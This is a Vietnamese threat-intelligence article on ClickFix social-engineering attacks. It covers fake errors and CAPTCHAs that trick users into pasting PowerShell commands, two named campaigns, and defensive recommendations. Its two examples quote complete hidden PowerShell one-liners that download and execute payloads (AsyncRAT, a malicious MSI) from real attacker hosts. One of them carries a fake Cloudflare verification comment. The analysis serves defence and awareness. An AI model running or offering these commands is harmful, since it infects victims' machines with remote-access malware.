ClickFix là một chiến thuật social engineering (kỹ thuật xã hội) nhằm thao túng người dùng thực hiện các hành động độc hại dưới danh nghĩa của việc xử lý sự cố hoặc bảo trì hệ thống. Bằng cách hiển thị thông báo lỗi giả, xác minh CAPTCHA giả, kẻ tấn công thuyết phục người dùng thực hiện các hành động sao chép và dán các lệnh độc hại vào terminal hoặc PowerShell.

Phía FPT Threat Intelligence cũng đã có một bài viết về các chiến dịch tấn công này, chi tiết xin xem tại: Cảnh báo hình thức tấn công mới giả mạo Google Chrome để khởi chạy PowerShell độc hại

Cách ClickFix hoạt động

Thuật ngữ ClickFix mô tả kịch bản cuộc tấn công này: thuyết phục người dùng nhấp vào liên kết hoặc thực thi lệnh mà họ tin rằng sẽ giải quyết một sự cố hệ thống, được hiển thị giả dạng các dịch vụ đáng tin cậy như Google Meet, Booking.com, Cloudflare hoặc nhóm hỗ trợ CNTT.

Những sự cố hệ thống giả này được gửi đến mục tiêu qua email phishing, cảnh báo dạng pop-up, hoặc giả mạo thông báo hệ thống. Các phương thức phân phối này tạo cảm giác cấp bách, khiến người dùng vô tình vô hiệu hóa các cơ chế bảo mật, tải xuống mã độc hoặc cấp quyền truy cập từ xa cho kẻ tấn công.

Một khía cạnh đặc biệt nguy hiểm của ClickFix là khi kẻ tấn công hướng dẫn người dùng sao chép và dán mã độc vào các giao diện dòng lệnh như PowerShell (Windows) hoặc Terminal (Mac/Linux).

Hình 1. Giả mạo thông báo lỗi để lừa người dùng sao chép và thực thi mã trong PowerShell

Do các giải pháp bảo mật hiện đại thường chặn việc tải xuống mã độc tự động, kẻ tấn công có thể vượt qua các biện pháp bảo vệ này bằng cách thao túng người dùng tự tay thực thi các lệnh. Nếu thành công, kẻ tấn công có thể đạt được quyền truy cập hệ thống ngang bằng với nạn nhân, dẫn đến đánh cắp dữ liệu, lộ thông tin xác thực, hoặc chiếm quyền điều khiển hệ thống hoàn toàn.

Ngoài ra, một dạng lừa đảo mới được phát hiện gần đây đó là thao túng người dùng dán lệnh độc hại vào PowerShell hoặc Terminal để hoàn thành Capcha, thay thế cho phương pháp giải Capcha truyền thống.

Hình 2. Giả mạo thông báo Capcha để lừa người dùng sao chép và thực thi mã trong PowerShell

Sự gia tăng gần đây của các cuộc tấn công ClickFix

Các nhà nghiên cứu an ninh mạng đã ghi nhận sự gia tăng đột biến của các cuộc tấn công dựa trên ClickFix kể từ cuối năm 2024. Hai chiến dịch nổi bật minh chứng cho xu hướng này:

• Chiến dịch OBSCURE#BAT – Nhắm vào người dùng nói tiếng Anh tại Mỹ, Canada, Đức và Anh, sử dụng các trang xác minh CAPTCHA giả. Nạn nhân được chuyển hướng đến các trang CAPTCHA có vẻ hợp pháp của Cloudflare, nơi họ bị lừa sao chép và chạy một script .bat độc hại để cài mã độc.

• Chiến dịch phishing Storm-1865 – Kẻ tấn công giả danh Booking.com để nhắm vào ngành khách sạn tại Bắc Mỹ, Châu Âu và Châu Á. Email thông báo rằng doanh nghiệp đã nhận được đánh giá tiêu cực từ khách, yêu cầu họ nhấp vào liên kết giả mạo hoặc mở tệp PDF đính kèm. Nạn nhân làm theo đã vô tình bị lộ thông tin xác thực và nhiễm mã độc.

Ví dụ 1: Tấn công vào tổ chức phi lợi nhuận tại Bắc Mỹ

Một nhân viên bị dụ dỗ thực thi lệnh sau:

'C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h -c '$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex'

Đây là một lệnh PowerShell được thiết kế để tải về và thực thi script từ xa một cách lén lút. Nó:

• Khởi chạy PowerShell ở chế độ ẩn.

• Tạo mã định danh dựa trên timestamp hiện tại (Unix time).

• Tải về script từ máy chủ (138.199.161[.]141:8080) bằng Invoke-RestMethod (irm).

• Thực thi ngay lập tức bằng Invoke-Expression (iex).

Script này được cấu hình để cài AsyncRAT – một công cụ Remote Access Tool (RAT) mã nguồn mở mạnh mẽ, thường dùng để giám sát, ghi lại phím gõ, đánh cắp thông tin đăng nhập và điều khiển từ xa hệ thống bị nhiễm.

Địa chỉ IP 138.199.161[.]141 đặt tại Đức, được Virus Total đánh dấu độc hại bởi 1 nhà cung cấp bảo mật.

Ví dụ 2: Tấn công vào công ty xây dựng Canada

Kẻ tấn công cố gắng lừa nhân viên thực thi lệnh:

'C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe' -W Hidden iwr -Uri 'https://overtimeforus[.]com/dow' -O $env:PUBLIC\\abc.msi;start $env:PUBLIC\\abc.msi # I am not a robot: Cloudflare Verification ID: 12Z-51P

Lệnh này được thiết kế để tải về và cài đặt file MSI độc hại một cách âm thầm:

• Sử dụng PowerShell ở chế độ ẩn.

• Tải file .msi từ https[:]//overtimeforus.com/dow bằng Invoke-WebRequest (iwr).

• Lưu vào thư mục Public, sau đó tự động thực thi.

Dòng chú thích giả mạo xác minh Cloudflare nhằm đánh lừa người dùng nghĩ đây là quy trình bảo mật hợp pháp.

Đường dẫn này bị Virus Total đánh dấu độc hại bởi 10 nhà cung cấp bảo mật.

Khuyến nghị

Phía FPT Threat Intelligence khuyến nghị tổ chức và cá nhân một số cách để phòng chống chiến dịch tấn công này:

• Hạn chế sử dụng dòng lệnh

  • Áp dụng chính sách giới hạn việc sử dụng PowerShell, Terminal, CMD đối với người dùng không có quyền quản trị.

  • Vô hiệu hóa khả năng chạy script từ nguồn không đáng tin cậy. Cấu hình chính sách thực thi PowerShell để chặn lệnh trái phép.

• Triển khai giải pháp phát hiện mối đe dọa nâng cao

  • Sử dụng dịch vụ Managed Detection and Response (MDR) như Field Effect MDR để giám sát liên tục và phát hiện bất thường.

  • Công cụ phân tích hành vi giúp phát hiện hành vi sao chép lệnh từ trình duyệt sang dòng lệnh.

• Tăng cường lọc email và web

  • Chặn email phishing dụ người dùng chạy script độc hại.

  • Dùng sandbox kiểm tra tệp đính kèm và liên kết trước khi cho vào hộp thư.

• Đào tạo người dùng nhận diện ClickFix

  • Nhân viên nên hoài nghi các hướng dẫn xử lý sự cố bất ngờ và tuyệt đối không nhập lệnh vào PowerShell hoặc CMD nếu không xác minh được nguồn.

  • Đội IT nên thường xuyên tổ chức mô phỏng phishing để củng cố nhận thức.

• Duy trì cập nhật bảo mật

  • Cập nhật phần mềm và chính sách bảo mật thường xuyên.

  • Thực hiện đánh giá lỗ hổng định kỳ để phát hiện điểm yếu trước khi bị khai thác.

Tham khảo

• Cảnh báo hình thức tấn công mới giả mạo Google Chrome để khởi chạy PowerShell độc hại

• ClickFix: The rising threat of social engineering through fake fixes